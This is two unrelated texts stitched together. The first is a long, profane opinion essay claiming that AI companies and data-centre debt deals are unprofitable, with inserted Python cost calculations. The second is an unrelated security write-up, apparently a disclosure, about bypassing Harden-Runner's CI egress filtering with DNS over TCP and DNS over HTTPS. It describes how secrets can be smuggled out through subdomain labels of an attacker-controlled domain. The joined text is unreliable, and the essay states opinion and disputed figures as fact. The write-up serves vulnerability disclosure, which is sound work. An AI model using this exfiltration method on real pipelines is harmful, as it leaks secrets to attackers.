At the end of January, OpenAI CFO Sarah Firar said that “our ability to serve customers—as measured by revenue—directly tracks available compute,” messily suggesting that the more compute you have, the more revenue you have.

This is, of course, a big bucket of bollocks. Did OpenAI scale its compute dramatically between hitting $20 billion in annualized revenue (to be clear, I have deep suspicions about these numbers and how OpenAI measures “annualized” revenue) in January 2026 and $25 billion in March 2026? I think that’s highly unlikely.

I also have to ask — where are all these compute-limited customers, exactly? If revenue scales with compute, wouldn’t that mean that each increase in compute availability would be allowing somebody to pay OpenAI or Anthropic that couldn’t do so before? I don’t see any reports of customers who can’t pay either company due to a lack of available compute. Are there training runs that can’t be done right now? That doesn’t really make sense either, because training doesn’t automatically lead to more revenue, other than in releasing a new model, I guess?

It’s almost as if every talking point in the generative AI industry is the executives in question saying stuff in the hopes that people will just blindly repeat it!

But really folks, we’ve gotta start asking: where’s the money?

Anthropic made $5 billion in revenue in its entire existence and spent $10 billion just on compute. OpenAI claims it made $13.1 billion in revenue in 2025 and “only” lost $8 billion — but those numbers seem unlikely considering my report from November of last year that had OpenAI at $4.3 billion in revenue on $8.67 billion of inference costs through September 2025, and this is accrual accounting, which means these are from the quarters in question. How likely do you think it is that OpenAI booked $8.8 billion in a quarter (Q4 CY2025) and only lost $8 billion in the year after it lost $12 billion (per the Wall Street Journal) in the previous quarter?

Look, I get it! This isn’t a situation where thinking critically is rewarded. Even articles explicitly criticizing the economics of these companies are still filled with weasel wording about “expects to grow” and “anticipates hitting,” or the dreaded phrase “if their bet pays off.” Saying obvious stuff like “every AI company is unprofitable” or “there is no path to profitability” or “nobody is talking about AI revenues” is considered unfair or cynical or contrarian, even though these are very reasonable and logical statements grounded in reality.

“But Ed! What about Uber!”

What about Uber? Uber is a completely different business to Anthropic and OpenAI or any other AI company. It lost about $30 billion in the last decade or so, and turned a weird kind of profitable through a combination of cutting multiple markets and business lines (e.g., autonomous cars), all while gouging customers and paying drivers less.

The economics are also completely different. Uber does not pay for its drivers’ gas, nor their cars, nor does it own any vehicles. Its PP&E has been between $1.5 billion and $2.1 billion since it was founded. Uber’s revenue does not increase with acquisitions of PP&E, nor does its business become significantly more expensive based on how far a driver drives, how many passengers they might have in a day, or how many meals they might deliver.
Uber is, effectively, a digital marketplace for getting stuff or people moved from one place to another, and its losses are attributed to the constant need to market itself to customers for fear that other rideshare (Lyft) or delivery companies (DoorDash, Seamless) might take its cash. Also: Uber’s primary business model was on a ride-by-ride basis, not a monthly subscription. Users may have been paying less, but they were still thinking about each transaction with Uber in terms that made sense when prices were raised (though it briefly tried an unlimited ride pass option in 2016).

Charging on a ride-by-ride basis was the smartest move that Uber made, as it meant that when prices went up, users didn’t have to change their habits.

AI companies make money either through selling subscriptions (or some sort of token-based access to a model) or by renting their models out via their APIs. One of their biggest mistakes was offering any kind of monthly subscription to their services, because the compute cost of a user is almost impossible to reconcile with any amount they’d pay a month, as the exponential complexity of a task is impossible to predict, both based on user habits and the unreliability of an AI model in how it might try and produce an output.

Let’s give an example. Somebody spending $20 a month on a Claude subscription can spend as much as $163 in compute. There are a couple of possible reasons this might be happening, and in both cases, Anthropic (and OpenAI, for that matter) is screwed. If we assume Anthropic’s gross margin is 38% (per The Information, though to be clear I no longer trust any leak from Anthropic, also no, Dario did not say Anthropic had 50% gross margins, it was a hypothetical), that would mean that $163 of compute costs it $101.

Now, not every user is spending that much, but, considering the aggressive (and deceptive) media campaign around Claude Code, I imagine a great many are, at the very least, testing the limits of the product. Those on the Max $100 and $200-a-month plans are specifically paying for fewer rate limits, meaning that they are explicitly paying to burn more tokens.

The obvious argument that you could make is that Anthropic could simply increase the price of the subscription product, but I need to be clear that for any of this to make sense, it would have to do so by at least 300%, and even then that might not do the job. This would immediately price out most consumers — an $80-a-month subscription would immediately price out just about every consumer, and turn this from a “kind of like the cost of Netflix” purchase into something that has to have obvious, defined results. A $400-a-month or $800-a-month subscription would make a Claude or ChatGPT Pro subscription the size of a car payment. For a company with 100 engineers, a subscription to Claude Max 5x would run at around $480,000 a year. And this is assuming that rate limits stay the same, which I doubt they would.

In any case, there is no future for any AI company that uses a subscription-based approach, at least not one where they don’t directly pass on the cost of compute. This is a huge problem for both Anthropic and OpenAI, as their scurrilous growth-lust means that they’ve done everything they can to get customers used to paying a single monthly cost that directly obfuscates the cost of doing business.

I need to be very direct about what this means, because it’s very important and rarely if ever discussed.
A user of ChatGPT or Claude Code is only thinking of “tokens” or “compute” in the most indirect sense — a vague awareness of the model using something to do something else, totally unmoored from the customer’s use of the product. All they see is the monthly subscription cost ($20, $100, or $200-a-month) and rate limits that vaguely say you have X% of your five-hour allowance left. Users are not educated in (nor are they thinking about) their “token burn” or burden on the company, because software has basically never made them do so in the past.

This means it will be very, very difficult to increase subscription costs on users, and near-impossible to convince them to pay the cost of the API. It’s like if Uber, which had charged $20-a-month for unlimited rides, suddenly started charging users their drivers’ gas costs, and gas was at around $250 a gallon.

That might not even do the price disparity justice. This theoretical example still involves users being in the back of a car and being driven a distance, and that said driving costs gas. Token burn is an obtuse, irregular process priced per million input and output tokens, with the latter increasing when you use reasoning models, which use output tokens to break down how they might handle a task.

The majority of AI users do not think in these terms, and even technical users that do have likely been using a monthly subscription, which doesn’t make them think about the costs. Think about it — you log onto Claude Code every day and do all your work on it, sometimes bumping into rate limits, then coming back five hours (or however long) later and doing the same thing. Perhaps you’re thinking that a particular task might burn more tokens, or that you should use a model like Claude Sonnet over Claude Opus so that you don’t hit your limits earlier, but you do not, in most cases, even if you know the costs of a model, think about them in a way that’s useful.

Let’s say that Anthropic and OpenAI immediately decide to switch everybody to the API. How would anybody actually budget? Is somebody that pays $200 a month for Claude Max going to be comfortable paying $1000 or $1500 or $2500 a month in costs, with, at that point, really no firm understanding of the cost of a particular action?

First, there’s no way to anticipate how many tokens a prompt will actually burn, which makes any kind of budgeting a non-starter. It’s like going to the supermarket and committing to buy a gallon of milk, not knowing if it’ll cost you $5 or $50.

But also, suppose a prompt doesn’t quite return the result you need, and thus, you’re forced to run it again — perhaps with slightly altered phrasing, or with more exposition to ensure the model has every detail you need. And again, you have no idea how many tokens the model will burn. How does a person budget for that kind of thing?

This is a problem both based on user habits and the unreliability of Large Language Models — such as spending several minutes “thinking” when they get stuck in loops trying to evaluate code or come up with a way to execute a task. User habits are also antithetical to switching from a paid subscription to metered access to models. A user might forgive Claude for chasing its own tail for several minutes when not burdened by the cost of it doing so, but if that act cost $2 or $3 or $10, they may hesitate to use the model at all.

I’ll give you another example. You, a relative novice, decide to use Claude Code to build a dinky little personal website.
During the process, Claude Code gets lost, messes up a few little things, taking a few minutes in aggregate, and you calmly tell it to fix things and do what you’d like, and after a little back-and-forth you get something you’re happy with. As you try and upload it to Amazon Web Services, you get stuck, and spend ten minutes getting it to explain how you get the website online.

At $20 a month, you might find this process delightful, empowering even. You just coded a website (even if it was a clone of one of thousands of different online templates), and you did so using natural language. Wow! What a magical world we live in.

You realize as you look at the website that you forgot to add a section. Doing so takes another half an hour. You bump into your rate limits, take a break for five hours, then come back and finish it at the end of the day. The model has told you the entire time that you’re a genius for making this, and the website rocks, and that you built it, even though you didn’t.

If you were paying via the API, this excursion could’ve cost you anywhere from $5 to $15. Every single little back-and-forth begins to add up. Every little change. Every little addition. Every attempt that Claude makes to fix something but makes it worse. Every “I don’t get it” you feed it about AWS.

It’s difficult to actually say what it was that made it expensive or not, and doing so adds a level of cognitive burden on top of the constant vigilance you need to make sure the model doesn’t do something unproductive. Even explicit, direct and well-manicured prompts can lead these models on expensive little expeditions.

Token burn isn’t something that neatly maps to another way that we pay for things outside of cloud storage, and even then, there are very few services that rival the chaotic costs of Large Language Models. Even if people can conceptualize that there are inputs and outputs, the latter of which cost more money, mapping a task to a reliable amount of tokens is actually pretty difficult.

Even if these companies were profitable on inference (I do not believe they are), they are dramatically, horrendously unprofitable on subscriptions, and there isn’t a chance in Hell that the majority of those subscriptions convert into token-based API users. When Uber — a completely different business, to be clear — jacked up prices, it did so gradually, and also didn’t ask users to dramatically shift how they think about using the app.

Anthropic and OpenAI have no clean way to jack up prices or cut costs. They can increase subscription fees, but doing so would lead to users paying two to five times what they’re paying today, which would undoubtedly lead to massive churn.

They could also reduce rate limits with the intention of pushing people toward the API, but as I’ve discussed, subscription-based customers are neither educated about nor prepared to pay for a confusing, metered service that directly counters habits driven by an abundance of token burn. Users are not taught to be considerate of their burn or mindful of their costs when using a subscription-based LLM.

The other problem is that these companies don’t really appear to have a way to cut costs, because inference remains very expensive and training costs are never going away: I hear a lot of wank about “ASICs” and “TPUs” that will magically bring down costs. When? How? Oh, NVIDIA’s latest chip is 10x more efficient or some bullshit? Show me the fucking evidence!
Because every time the revenues and costs get reported, the revenues seem lower and the costs seem higher.

And it’s completely fucking insane that we don’t have an answer beyond “things will get cheaper” or “prices will go up.” Despite everybody talking about it endlessly for three god damn years, LLMs lack the kind of obvious, replicable, industrially-necessary outcomes that make a 3x, 4x or 10x price increase tenable.

I also think that Anthropic and OpenAI have deliberately used their subscriptions as a means of conning the media into conceptualizing AI as far more affordable than it actually is. Most users do not have any real idea of how much it costs to use these services, let alone how much it costs to run them. All of that glowing, effusive press around Claude Code was based on outcomes that were both subsidized and obfuscated by Anthropic. I think that these articles would’ve been much less positive if the reporters were even aware of the actual costs.

So, let’s do some maths, shall we? Assume a business has 100 engineers, and currently pays $200 a month for each engineer to use Claude Max, at a cost of $20,000 a month, or $240,000 a year. Let’s assume on average you pay your engineers $125,000, meaning that your salaries are $12.5 million a year, not considering other costs (this is a toy example). Now imagine that Claude switches to a metered billing system.

Let’s assume that, in actuality, these engineers are burning a mere $10 a day in tokens, which brings costs to $365,000 a year, or an increase of $125,000… and remember, this is a team of engineers that were previously used to a subscription that allowed them to spend upwards of $2700 a month in tokens, or nearly 10 times the $300 a month they’re now spending.

Let’s be a little more realistic, and bump that number up to $25. Now you’re spending $912,500 a year in tokens. $30 a day puts you over a million bucks. Oops, busy month, you’re now spending $40 a day. Now you’re spending more than 10% of your salaries on compute costs.

Anthropic’s own Claude Code documentation says that the average cost is $6 per-developer-per-day, with “daily costs remaining below $12 for 90% of users.” Good news! If you, as an engineer, can limit your usage to $6 a day, you’re actually saving the company money!

But you’re not spending $6 a day. That’s a silly number for anybody coding. One user on Reddit said that they spent $200-to-300 a day on API costs and decided instead to spend $40 to $50 a day on a GPU cluster on Lambda to use the open source model Qwen 3.5 to handle their code, which still works out at $14,600 a year. Another user found that their parallel Claude Code sessions using Claude’s $200-a-month plan (I assume using multiple accounts) worked out to around $12,000 a month in API costs. Another, who hit their limits on their Max subscription, “only needed another hour or two to finish a project,” and that hour or two resulted in almost $600 in API costs.

Even the boosters are beginning to worry. Last week, Chamath Palihapitiya made a shockingly reasonable point:

When ROI indeed, Chamath. The fact that one of the most-prominent voices (for better or worse) in the tech industry is unable to get a straight answer to “where is the return on investment” — somebody directly incentivized to keep the party going — should have everybody a little worried.

Really though, where is the ROI? Who is actually getting a profit out of this? NVIDIA? The companies that make RAM?
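Reproducing the toy maths above in a few lines (the figures are straight from the example; the per-day burn rates are the post’s hypotheticals):

```python
# The toy cost model from above: 100 engineers moving from $200/month
# subscriptions to metered billing at various per-day token burn rates.
ENGINEERS = 100
subscription_per_year = ENGINEERS * 200 * 12  # $240,000

for per_day in (10, 25, 30, 40):
    metered = ENGINEERS * per_day * 365
    delta = metered - subscription_per_year
    print(f"${per_day}/day -> ${metered:,}/year (+${delta:,} vs. subscription)")
```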
Because it doesn’t seem to be the companies who are buying the GPUs. It doesn’t seem to be the AI companies. I don’t think it’s true, but if you believe it, you believe code is truly being automated away — to what end? What are the actual documented economic effects we can point at, and what are the actual meaningful changes to the world?

Real data. Something from today, please. You are legally banned from saying the words “soon” or “in the future.” No more future-tense. It’s not allowed. All of my stuff has to be in the present — so yours should too.

Let’s do a quick-fire round: Boosters, I am begging of you — point to one thing TODAY, from TODAY’s models, that even remotely justifies burning nearly a trillion dollars and filling our internet full of slop and creating the moral distance from an action that might have blown up a school and empowering the theft of millions of people’s work and having to hear every fucking day about Sam Altman and Dario Amodei, two terrifyingly boring and annoying oafs with no culture and no whimsy in their wretched little hearts.

Even if you are impressed by what LLMs can do, remember that what you’re impressed by is the result of burning more money than anybody has ever burned on anything, including the Great Financial Crisis’ Troubled Asset Relief Program (a little over $400 billion) and the COVID Paycheck Protection Program (somewhere between $800 billion and $900 billion). Anthropic and OpenAI have raised (assuming OpenAI gets all the money) over $200 billion in funding, on top of nearly $700 billion in capex in 2026 alone across Google, Amazon, Meta, and Microsoft, on top of the $800 billion or so they’ve already spent. I haven’t even included the tens of billions spent by CoreWeave, or the $178.5 billion in US-based data center debt deals from 2025, or the hundreds of billions of venture dollars that went to AI companies worldwide.

Yet when you look even an inch below the surface, everything seems kind of shit.

Per my Hater’s Guide To The SaaSpocalypse: Every single AI startup without exception does the same thing: turn hundreds of millions of dollars into tens of millions of dollars, or a few billion dollars into a few hundred million dollars. None of them are improving their margins. None of them have a solution.

Every single problem I’ve discussed above about the costs of running Anthropic or OpenAI applies directly to every AI startup, except they have far less venture capital backing and are subject, as Cursor was back in June 2025, to whatever price increases Anthropic or OpenAI decide, such as adding “priority processing” that’s effectively mandatory to have consistent access to frontier models.

Absolutely none of these companies have a plan. The only reason anyone is still humouring them is that the media and venture capital continue to promote the idea that — without explaining how — they will magically find a way of becoming margin positive. When? How? Those are problems for rubes who don’t know we’re living in the future! Let’s hope that venture capital can afford to fund them in perpetuity!

They can’t, of course, because venture capital has had dogshit returns since 2018, and AI startups do not have much intellectual property, as most of them are just wrappers for frontier AI labs who also don’t have any path to profitability. As I covered last week, the story is similar for public companies.

Adobe’s “AI-first” revenue ($375 million ARR) works out to about $94 million a quarter at most for a company that makes $6 billion a quarter.
ServiceNow has "$600 million in annual contract value," an extrapolation of a non-specific period's revenue that does not actually mean $600 million, for a company that makes over $10 billion a year. Salesforce's Agentforce revenue is $800 million, or roughly $66 million a month, for a company that makes over $11 billion a year. Shopify, the company that mandates you prove that AI can't do a job before asking for resources, does not break out AI revenue. Workday, a company that makes about $2.5 billion a quarter in revenue, said it "generated over $100 million in new ACV from emerging AI products, [and that] overall ARR from these solutions was over $400 million." $400 million ARR is $33 million a month.

To be clear, ARR is not a consistent figure, and churn happens all the time, especially for products like LLMs that have questionable outcomes and high prices. Four fucking years of this and we're still talking about this stuff in riddles, mostly because it's a terrible business.

Then there's the infrastructure issue. One of the more recent (and egregious) failures of journalism is the reporting of data center deals. Before we go any further, one very important detail: when you read "active power," that does not mean actual available compute capacity, which is called "IT load." Per my premium data center model from a few months ago, you should take any "active power" figure and divide it by 1.3 to account for PUE — the standard measure of power usage effectiveness that covers everything required to get power to the IT gear, and all the infrastructure necessary to keep things running, like cooling systems.

Anywho, Bloomberg just reported that Meta had signed a "$27 billion" compute capacity deal, with "$12 billion of capacity available in 2027," with AI compute company Nebius. Based on discussions with numerous experts in AI infrastructure, compute works out to about $12.5 million per megawatt, meaning that "$12 billion of dedicated capacity" would be around 960MW of IT load. And, of course, Nebius just raised $3.75 billion in debt on the back of that compute deal. This is on top of Microsoft's $17.4 billion deal, and, of course, Meta's $3 billion deal from last year.

One little problem: as of its February 12, 2026 Letter to Shareholders, Nebius has around 170MW of active power. How the fuck is it going to have that capacity ready, exactly?
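Here's that gap as back-of-envelope arithmetic, using the 1.3 PUE divisor and the roughly $12.5-million-per-megawatt figure from above. Treat it as a sketch; the deal values just quoted are the only inputs.

```python
PUE = 1.3                 # divide "active power" by this to get IT load
COST_PER_MW = 12.5e6      # ~$12.5M per megawatt of compute, per my sources

promised_mw = 12e9 / COST_PER_MW   # "$12B of capacity available in 2027"
current_mw = 170 / PUE             # ~170MW of active power today

print(f"promised:  {promised_mw:.0f}MW of IT load")   # 960MW
print(f"built:     {current_mw:.0f}MW of IT load")    # ~131MW
print(f"shortfall: {promised_mw - current_mw:.0f}MW")
```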
For some context, CoreWeave — an AI compute company backed by (and backstopped by) NVIDIA, with an entirely separate company (Core Scientific) building its capacity, with backing from Blackstone and seemingly every major financier in the world — managed to go from 420MW of active power (NOT IT load) in Q1 2025 to 850MW of active power in Q4 2025, with much of that already under construction in Q1 2025.

Nebius only started building its 300MW of New Jersey-based compute in March 2025, and based on its letter to shareholders, things aren't going very well at all.

Then there's Nscale, a company that raised $2 billion from NVIDIA, Lenovo and a bunch of other investors, and this week signed a "1.35GW deal" with Microsoft to fill a data center with the latest generation of Vera Rubin GPUs. In September 2025, NVIDIA CEO Jensen Huang said that the UK was going to be an "AI superpower" as he plunged hundreds of millions of dollars into Nscale as part of an "historic commitment to the UK AI sector" between NVIDIA, OpenAI, and Microsoft.

When The Guardian visited the supposed site of Nscale's UK-based data center in February 2026 — which is meant to be built by the end of the year — it found "...a depot stacked with pylons and scrap metal under a corrugated roof, while flatbed lorries drove in and out stacked with poles." As part of the investigation, The Guardian found that the supposed billions of dollars in data center commitments made by Nscale and CoreWeave were never checked by the government, and that no mechanism existed to audit them. The response from both CoreWeave and Nscale was that these billions of dollars of investments would mostly be in NVIDIA GPUs, which is where we get to the "why" of these massive compute contracts.

You see, when Nebius, or Nscale, or CoreWeave signs a giant deal that it doesn't have the capacity to provide, it does so specifically to raise debt on the contract to buy NVIDIA GPUs, a cycle CoreWeave itself diagrammed in its Q1 2025 earnings presentation. If people were actually paying attention, they'd see the immediate problem: a data center takes an incredible amount of time to build, and takes longer depending on the amount of capacity necessary.

It's a deeply cynical con. Hyperscalers like Microsoft and Meta are paying for these contracts because they don't reflect as assets on the balance sheet, all while moving the risk onto the AI compute company — and if the AI company misses a deadline, the hyperscaler can walk away. For example, Nebius' deal with Microsoft from last year has a clause saying that if Nebius "...fails to meet agreed delivery dates for a GPU Service and the Company cannot provide alternative capacity, Microsoft has the right to terminate that GPU Service."

Based on discussions with people with direct knowledge of its infrastructure, Microsoft has already set Nebius up to fail, with the expectation that it would have over 50MW of IT load, specifically made up of NVIDIA's GB200 and GB300 GPUs, available by the end of April, with at least another 150MW of IT load (or more) by the end of the year. This is a company that only has about 130MW of IT load in its entire global infrastructure, most of which isn't in Vineland, New Jersey.

Hyperscalers are helping no-name companies with little or no history or experience in building data centers borrow billions of dollars in debt, debt increasingly funded by people's retirements and insurance funds, lured in by the idea of "consistent yields" from companies that cannot afford to do business without convincing everybody to believe the illogical.

Data centers take forever to build. The "1.2GW" (so 880MW of IT load) Stargate Abilene's first two buildings were meant to be fully energized by the middle of 2025. Only the first two buildings' worth of 96,000 GPUs were "delivered" by the middle of December 2025, and while the entire project was meant to be energized by mid-2026, it appears that only two buildings are actually ready to go.

Every report on these deals should include a timeline. In the end, I bet Stargate Abilene never gets built, but if it does, I'd be shocked if it's done before the middle of 2027, which would mean it takes about three years per gigawatt of power, or about a year per 293MW of IT load.

I have read absolutely zero fucking stories about data center development that take this into account.
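The sniff test takes three lines. A sketch, using the roughly 293MW of IT load per year that my Abilene estimate implies, applied (purely as an illustration) to Nscale's "1.35GW" Microsoft deal:

```python
PUE = 1.3
BUILD_RATE_MW_PER_YEAR = 293   # IT load per year, per the Abilene arithmetic

def years_to_build(announced_gw: float) -> float:
    """Years of construction a headline 'gigawatt' figure implies."""
    it_load_mw = announced_gw * 1000 / PUE
    return it_load_mw / BUILD_RATE_MW_PER_YEAR

print(f"{years_to_build(1.35):.1f} years")   # ~3.5 years, not "by end of year"
```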
The flippancy with which the media reports on these data centers — both in the structure of the deals and the realities of the construction (I go into detail about this in a premium piece from late last year, but making data centers is hard) — is allowing con artists to get rich and creating the conditions for yet another great financial crisis.

Pension funds and state investment boards are reading about these deals, seeing "Microsoft," and assuming that everything will be fine. Per my Hater's Guide To Private Equity:

All that the pension fund sees is an article on CNBC or Bloomberg and the name of a company like Microsoft or Meta. In turn, they (or the private credit firm managing their money) buy bonds or fund these debt deals because they see them as stable, straightforward, reliable investment yields, because the media and private credit firms are selling them as such.

In reality, data center debt deals are incredibly dangerous, as each one is effectively a bet on both the existence of AI demand (so that the debt can be repaid with revenue) and the existence of the company in question as a going concern. Nscale, Nebius and CoreWeave are only a few years old, and the concept of a 1GW data center is not much older.

During the great financial crisis, massive amounts — billions and billions of dollars' worth — of pension and insurance funds went into Collateralized Debt Obligations (CDOs) that were rated as AAA despite being a rat king of low-grade (and in many cases delinquent) debt. This time around, data center debt deals are often given junk ratings — such as the B+ rating given to one of CoreWeave's 2025 debt deals — which might make you think that there's nothing to worry about, and that investors would naturally steer clear of these investments. The problem is that the markets have AI psychosis, and thus believe anything to do with data centers is a natural winner. Blackstone funded part of its $38 billion investment in Oracle's data centers — you know, the ones explicitly built for OpenAI, which cannot afford to pay for the compute — using its insurance funds. Per The Information:

This is the standard line from anybody in finance about data centers, and it's based on little more than wish-casting and fantasy. These are brand new kinds of debt for some of the largest infrastructure projects in history, and as I've discussed repeatedly, outside of hyperscalers moving compute off of their balance sheets, there's only a billion dollars of compute demand. 77% of CoreWeave's 2025 revenue — and keep in mind that CoreWeave is the largest independent AI compute provider — was from Microsoft and NVIDIA, the latter of which plans to spend $26 billion in the next five years on renting back its own GPUs… which suggests that little organic demand exists.

2026 or 2027's great financial crisis will replace "homes" with "data centers," and I worry it'll be calamitous for the pensions and insurance funds that have tied their futures to AI.

Even putting aside my own personal feelings about LLMs… I'm just not sure why we're doing this anymore. Okay, okay, I know why we're doing it — the software industry is out of hypergrowth ideas and has been in a years-long decline since 2018, though it briefly had a burst of excitement in 2021 when money was cheap and everybody was insane after the lockdowns ended.
Nevertheless, AI has become one of the largest cons in history, bought and sold based on stuff it can't do (but might do, one day, at some non-specific time), its blatant swindles and acidic economics constantly ignored, all made possible by regulators, media and markets piloted by people that don't know, or don't want to know, what's actually happening.

If you are an AI fan, I need to genuinely ask you to consider whether what you're impressed by is what LLMs can do today, rather than what they might be able to do tomorrow. If you're excited based on the potential, you're not excited about technology, you're excited about marketing.

And I get it. The tech industry hasn't had anything really exciting in a while. It's easy to get swept away by hype, especially when everybody is being swept away in exactly the same way. It's hard to push back when Microsoft, Google, Meta and Amazon are all participating in a financial death cult and their revenues keep growing — having to understand anything more than the headlines is tough, and you've got all this shit to do, and it's so much easier to just nod and agree with everybody else.

But know that this is an industry that sells itself on fear and lies. Know that LLMs cannot do many of the things that people talk about — they do not blackmail people, no, GPT-4 did not trick a TaskRabbit worker, and every single time an AI CEO says AI "will" do something, you should spit in their fucking face for making shit up, not print it without a second's thought.

It's time to get specific. What will AI do, and when will it do it? What will the actual software be? How will it work? How much will it cost? How will it make money? How will it become profitable? Because right now we're being sold a lie and I'm sick of it, almost as sick as I am of seeing critics framed as outlier factions spreading conspiracy theories. I've proven my point again and again and again. Where is the same effort from the AI boosters? All I see is the occasional desperate attempt to claim that LLMs doing what they've always done is somehow remarkable.

Oh wow, so you can code a clone of an open source software project, all set up by an LLM that may or may not get the code right. Oh, someone was able to vibe code something that may or may not work and looks exactly the same as every other vibe-coded project. Congratulations on making a website that's purple for some reason — you're puking out a facsimile of an era of websites defined by the colour scheme chosen by Tailwind CSS.

I also want to be clear that I am extremely nervous about how many people appear to be fine with not reading code. I am currently (very slowly) learning Python, and every new thing I learn reinforces my overwhelming anxiety that there is a lot of software being written today by people who don't read the output from LLMs and, in some cases, may not understand it if they did. I'm not saying all or even many software engineers do this, but I am alarmed by the idea that it's becoming more commonplace — and even more alarmed that the reaction appears to be "ah, it's fine, who gives a shit, it works."

Guess what! It doesn't always work. Amazon Web Services had multiple recent outages caused by use of its Kiro AI coding tool, and while it insists that AI isn't to blame, it also convened an internal meeting to discuss this specific issue, and the Financial Times reported that Amazon now requires junior and mid-level engineers to get sign-off on AI-assisted changes to code.
However you may feel about Amazon as a service, its engineers are likely indicative of corporate engineering on some level, which makes me wonder if we're going to have some real problems in software development in the next few years as a result. What does the software industry look like if nobody is actually reading their code? How many software engineers are comfortable doing this? I'm sure somebody will read this and get terribly offended, but to be clear, I'm not accusing you of copy-pasting code you can't understand and being happy if it works, unless that's exactly what you're doing.

To be explicit: allowing an LLM to write all of your code means that you are no longer developing code, nor are you learning how to develop code, nor are you going to become a better software engineer as a result. This isn't an insult or hyperbole. If you are just a person looking at code, you are only as good as the code the model makes, and as Mo Bitar recently discussed, these models are built to galvanize you, glaze you, and tell you that you're remarkable as you barely glance at globs of overwritten code that, even if it functions, eventually grows into a whole built with no intention or purpose other than what the model generated from your prompt.

I'm sure there are software engineers using these models ethically, who read all the code, who have complete mastery over it and use it like a glorified autocomplete. I'm also sure that there are some who are just asking it to do stuff, glancing at the code, and shipping it. It's impossible to measure how many sit in each camp, but hearing Spotify's CEO say that its top developers are basically not writing code anymore makes me deeply worried, because this shit isn't replacing software engineering at all — it's mindlessly removing friction and putting the burden of "good" or "right" on a user that it's intentionally gassing up.

Ultimately, this entire era is a test of a person's ability to understand and appreciate friction. Friction can be a very good thing. When I don't understand something, I make an effort to do so, and the moment it clicks is magical. In the last three years I've had to teach myself a great deal about finance, accountancy, and the greater technology industry, and there have been so many moments where I've walked away from the page frustrated, and stewed in self-doubt that I'd never understand something.

I also have the luxury of time, and sadly, many software engineers face increasingly-deranged deadlines set by bosses that don't understand a single fucking thing, let alone what LLMs are capable of or what responsible software engineering is. The push from above to use these models because they can "write code faster than a human" is a disastrous conflation of "fast" and "good," all because of flimsy myths peddled by venture capitalists and the media about LLMs being able to "write all code." The problem is that LLMs can write all of your code, but that doesn't mean the code is good, or that somebody can read the code and understand its intention, or that having a lot of code is a good thing for the present or the future of any company built on generated code.

And in the end, where are the signs that this is working? Where are the vibe-coded software products destabilizing incumbents? Where are the actual software engineers being replaced — not that I want this to happen, to be clear — by LLMs, outside of AI-washing stories that have got so egregious that even Sam Altman called it out? Where is the revenue?
Where are the returns? Where are the outcomes? Why are we still doing this?

Anthropic is intentionally subsidizing its subscribers' compute in an attempt to gain market share, and it is incapable of creating stable limitations on its models' compute costs, because Large Language Models cannot be "limited" in a linear sense to "only spend" a certain amount of tokens — it's impossible to guarantee how many tokens a task might take. To be clear, Anthropic can limit Claude subscriptions, as OpenAI can limit ChatGPT; I just doubt either can do so with precision.

"Hyperscalers are seeing incredible revenue growth, which is coming from AI!" Why aren't they telling us their AI revenues, then? Also, every single hyperscaler has hiked prices in the last few years, with Microsoft's latest increases including a 33% hike on cheap subscriptions for front-line workers. Fun fact! Microsoft was the only hyperscaler to ever talk about actual AI revenues, and last did so in January 2025, when it said it had reached a "$13 billion run rate" (so about $1.08 billion a month). It has never done so again.

"We're in the early day-" Shut up. Stop it. We're nearly four years in. What're you talking about?

"The exponential growth in capabilities of AI models-" I am calling Jigsaw from "Saw" if you cannot express to me in clear, certain and direct terms what it is that's actually changed. No benchmarks, either! They had to stop using SWE-Bench because models were trained specifically to solve it. Show me something that an LLM created, all on its own, and it better be fucking great, and fast too. Oh, it "sped up coders"? How? To what end? Is the code better? Did they lay people off?

"Block laid off 4000 people because of AI-" Yes, hello, Mr. Jigsaw? Yeah, it's Ed, you had me chained to a radiator the other week. No, I'm doing a lot better, I'm glad we talked things out. Anyway, I need your help with something. Everybody is saying that Block laid off 4000 people because of AI, and that proves something! All Jack Dorsey said was that "[Block is] already seeing that the intelligence tools [it's] creating and using…are enabling a new way of working which fundamentally changes what it means to build and run a company." I know, that doesn't mean anything, and all Block is doing is AI-washing, which is when a company uses AI as a scapegoat to justify laying people off. No, no, don't handcuff anyone to a radiator, I just needed somebody to talk to. Maybe later, okay?

Jokes aside, Block — like many other companies — aggressively recruited during the pandemic, with headcount growing by 2.5x between 2019 and 2025. And now, as market conditions are looking choppier, it seems to be trying to Ozempic away some of its corporate "bloat." Saying you're firing people because of AI is a bit less embarrassing than saying "we fucked up."

"[Software company] is still growing, so AI must be helping?-" Is that actually true? Have you looked? Because if you haven't, I wrote about this in the Hater's Guide To The SaaSpocalypse. AI is not actually driving much revenue at all!

devansh 1 month ago

More egress filtering bypasses in harden-runner

Egress filtering in CI/CD is supposed to keep secrets in and attacker callbacks out. If your build step only needs to talk to, say, github.com, it shouldn't be able to reach anything else. StepSecurity's Harden-Runner does this for GitHub Actions — you give it a list of allowed endpoints, set egress-policy: block, and everything else gets denied.

The filtering is domain-based. It watches outbound connections, checks the destination, and blocks anything not on the list. That works fine as long as data leaves through a visible connection to a visible domain. DNS gives you two ways around that.

The first is DNS over TCP. Harden-Runner doesn't adequately restrict DNS queries sent over TCP, so a single command bypasses the entire policy. The second is DNS over HTTPS (DoH), where a DNS query gets wrapped inside a normal HTTPS request to a public resolver like dns.google. The resolver acts as a proxy — Harden-Runner sees a legitimate HTTPS connection and lets it through. It never looks at what's inside.

Both issues affect Harden-Runner v2.13.3 (community version) and likely all prior versions.

What is Harden-Runner's Egress Policy?

Harden-Runner enforces egress policies on GitHub runners by filtering outbound connections at the network layer. When egress-policy: block is enabled with a restrictive allowed-endpoints list, all non-compliant outbound traffic should be denied. A typical hardened workflow runs the step-security/harden-runner action as the first step of the job, with the egress policy set to block and an explicit list of allowed endpoints. After this step, any outbound connection to a domain or port not on the whitelist should be blocked.

Egress Block Policy Bypass via DNS over TCP

DNS queries usually go over UDP on port 53. But DNS also works over TCP on the same port — it's standard, well-documented, and tools like dig support it with a flag. It's commonly used for large responses and zone transfers, nothing exotic.

Harden-Runner doesn't adequately restrict DNS queries sent over TCP. While it may handle standard UDP DNS and HTTPS connections, TCP-based DNS queries to an external resolver go through without being blocked or detected. That means a single dig query over TCP, with the stolen data packed into the subdomain labels of an attacker-controlled domain, is all it takes. The query goes over TCP to Google's resolver, gets forwarded to the attacker's nameserver, and the attacker reads the data out of the subdomain labels. Harden-Runner's dashboard shows zero outbound destinations and zero detections. And dig is pre-installed on every Ubuntu runner.

Proof of Concept

Harden-Runner shows 0 outbound destinations, 0 HTTPS events, and 0 detections. The Burp Collaborator server receives the DNS query. The entire egress block policy, bypassed with a single command.

